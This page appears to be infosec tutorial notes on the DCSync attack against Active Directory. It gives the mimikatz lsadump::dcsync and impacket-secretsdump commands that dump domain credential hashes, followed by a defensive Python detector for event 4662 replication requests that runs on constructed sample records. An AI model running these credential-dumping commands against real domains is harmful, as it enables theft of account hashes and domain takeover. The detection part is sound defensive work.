akde/infosec

Information security is ultimately about managing risk


Attacking Domain Controller Synchronization

The DRS (Directory Replication Service) is responsible for replicating a DC's data to the other, redundant DCs in the domain.

Scenario: You own a user who has one of the following rights:

  • Replicating Directory Changes
  • Replicating Directory Changes All
  • Replicating Directory Changes in Filtered Set

Normally, users in the following groups have these rights (this could be configured otherwise, of course):

  • Domain Admins
  • Enterprise Admins
  • Administrators

You can check with the script in Basic Active Directory Enumeration which users in the domain have these permissions.

If you have the power:

On Windows

  1. Start mimikatz
  2. Execute the following for the user with the permissions. Mimikatz impersonates a DC and uses replication commands to get all credentials of the given user:
    lsadump::dcsync /user:corp\peter
  3. Repeat this for all interesting users, e.g.:
    lsadump::dcsync /user:corp\Administrator

On Linux

Perform the following against some target $target, using $adminUser (who holds one of the rights above) as the authenticating account and $userToBreak (another user, or the same one) as the account to get the hashes of:

impacket-secretsdump -just-dc-user $userToBreak corp.com/$adminUser:"Winter2023!"@$target
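From the defender's side, both the mimikatz and the impacket path above show up on the domain controller as Security event 4662 (directory service access) carrying one of the DS-Replication-Get-Changes* extended rights, requested by an account that is not another DC. The following is an added example, not code from the original page: it applies that logic to constructed 4662-style records. The three GUIDs are the well-known extended-right GUIDs for the rights listed above; the field names follow the 4662 event schema, and the sample records and DC list are made up for the demonstration.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662 records."""
import re

# Extended-right GUIDs for the three replication rights listed on this page.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def find_dcsync(events, domain_controllers):
    """Return (subject, rights) for every 4662 that requests replication rights
    from a subject that is not a known DC computer account.

    events: iterable of dicts with keys EventID, SubjectUserName, Properties.
    domain_controllers: explicit allowlist of DC computer accounts, e.g. {"DC01$"}.
    (A trailing '$' alone is not trusted: any computer account could be abused.)
    """
    dcs = {dc.upper() for dc in domain_controllers}
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = sorted(
            REPLICATION_RIGHTS[g.lower()]
            for g in GUID_RE.findall(ev.get("Properties", ""))
            if g.lower() in REPLICATION_RIGHTS
        )
        if not rights:
            continue  # ordinary directory access, not replication
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in dcs:
            continue  # DC-to-DC replication is expected
        hits.append((subject, rights))
    return hits


# Constructed sample records (not real log data); the last GUID is a dummy.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "Properties":
     "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "peter", "Properties":
     "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "alice", "Properties":
     "Read Property {00000000-1111-2222-3333-444444444444}"},
    {"EventID": 4624, "SubjectUserName": "peter", "Properties": ""},
]

if __name__ == "__main__":
    for subject, rights in find_dcsync(SAMPLE_EVENTS, {"DC01$", "DC02$"}):
        print(f"possible DCSync by {subject}: {', '.join(rights)}")
```

Pair this with the ACL check referenced above: an account that is flagged here and also holds the rights outside the three admin groups is the first thing to review.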
